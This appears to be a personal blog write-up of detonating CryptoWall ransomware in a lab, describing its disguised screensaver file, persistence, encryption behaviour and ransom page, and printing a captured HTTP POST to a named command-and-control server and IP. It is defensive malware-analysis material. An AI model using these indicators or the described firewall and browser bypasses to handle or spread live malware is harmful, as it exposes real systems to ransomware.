What, am I crazy ?

No, I have a lab setup with a DMZ and loads of protection. I just need to download and run Cryptowall as my final step. My setup includes some sample data to encrypt,  wireshark for packet sniffing and Sysinternals Process Monitor.

So, let the fun begin. Thanks to the antivirus companies out there (Trend Micro etc) this is harder than I thought. I also had to dumb down my Sonicwall firewall to let viruses through. The antivirus companies have been taking down the virus URL’s faster than I can check them. It took ages to locate and download the Document-128_712.zip file. Awesome to see the AV companies are on top of their game.

So I had to bypass the built in Internet Explorer protection (It also wanted to kill my download) and finally I have Document-128_712.zip. I extracted out the contents. Document-128_712.scr with a PDF icon. I double click the screensaver file (Executable in disguise) and the file vanished. The mouse moves to an hourglass for a second and then nothing. I refer to the wireshark and process monitor. They are blitzing past recording data.

There is nothing at the desktop to indicate what is happening (except the hard disk light flashing). If I had been caught by this, I might be tempted to double click it again and again as nothing appears to happen.

As this thing encrypts alphabetically, I wait until I start seeing the signs of the encryption appearing in the hard drive sub folders and then I created a folder called “a” as in C:\a. It is safe as the process does not seem to double back once it has passed a letter of he alphabet. A nice place to save logs etc. So, here come the screenshots. Some from this current experiment, some from an actual infection.

PDF file

So here is the Scr file, renamed into bd99547.exe. Is is the same file as Document-128_712.scr as the hashes are the same. It is in the startup group so it you restart your pc, it continues to encrypt.

startup

 

Now showing all hidden files on the C:\ drive, I find a hidden folder with the same exe file in it.

hidden folder on c

 

So I let this thing continue on and do it’s job. The file exe file located in the startup startmenu category and on C:\ will vanish later. I watch as Process Monitor shows me the “exe”  file I ran, using Windows built in cryptography to encrypt everything. I note that the malware does not need to download anything from the internet. Microsoft have already provided everything it needs. It is using Microsofts own tools to hold us ransom.

I watch it connect to 199.127.225.232 and do a HTTP post. This server is called babyslutsnil.com

POST /da2c5yzx438 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 100
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Host: babyslutsnil.com
Cache-Control: no-cache

 z=109a242f761c53dbf5fa7883a817baff7b6f70eec0b2c20b9c59a99d5e6ddcb49ed56d8d6082a4df4909c8600c5850ad16HTTP/1.1 500 Internal Privoxy Error
Date: Sun, 29 Jun 2014 23:41:14 GMT
Content-Length: 778
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Last-Modified: Sun, 29 Jun 2014 23:41:14 GMT
Expires: Sat, 17 Jun 2000 12:00:00 GMT
Pragma: no-cache
Connection: close

 

html
head
title 500 Internal Privoxy Error /title
link rel=”shortcut icon” href=”http://config.privoxy.org/error-favicon.ico” type=”image/x-icon”> /head
body
h1 500 Internal Privoxy Error /h1
pPrivoxy encountered an error while processing your request:/p
pbCould not load template file codeforwarding-failed/code or one of its included components./b/p
p Please contact your proxy administrator./p
p If you are the proxy administrator, please put the required file(s)in the  code i (confdir) /i /templates /code  directory.  The location of the  code i (confdir) /i /code directory is specified in the main Privoxy code>config/code file.  (It’s typically the Privoxy install directory, or code/etc/privoxy//code)./p
/body
/html

I can only assume it is trying to send out the RSA encryption key to the remote server.

Then you start seeing the encrypted files in folders with additional files (DECRYPT_INSTRUCTION).

decryot files

Then you find a key in the registry which starts off the same as the exe file name

registry

 

and then the exe’s start to vanish and are replaced with the warnings you will see next reboot.

 

startup1

 

Then you get invited to go up, pay some money, download another exe file (Do you trust it?) with the decryption and away you go !

pay

It uses the TOR network for the website so there is no way to track these guys. They are annonymous and invisable.

Now the trick is to get these files and screen shots from “C:\a” onto my USB key, as when I plug it in, the files get encrypted.

Final step, FORMAT THE MACHINE. My packet Sniffs and Process monitoring has shown me that this Malware gets all over your PC.

Don’t fix it, reformat it. You can recover files from Backups or Volume Shadow copy but the underlying OS is now owned by some remote hacker. Don’t dice with death!

Moral: Have offline current backups !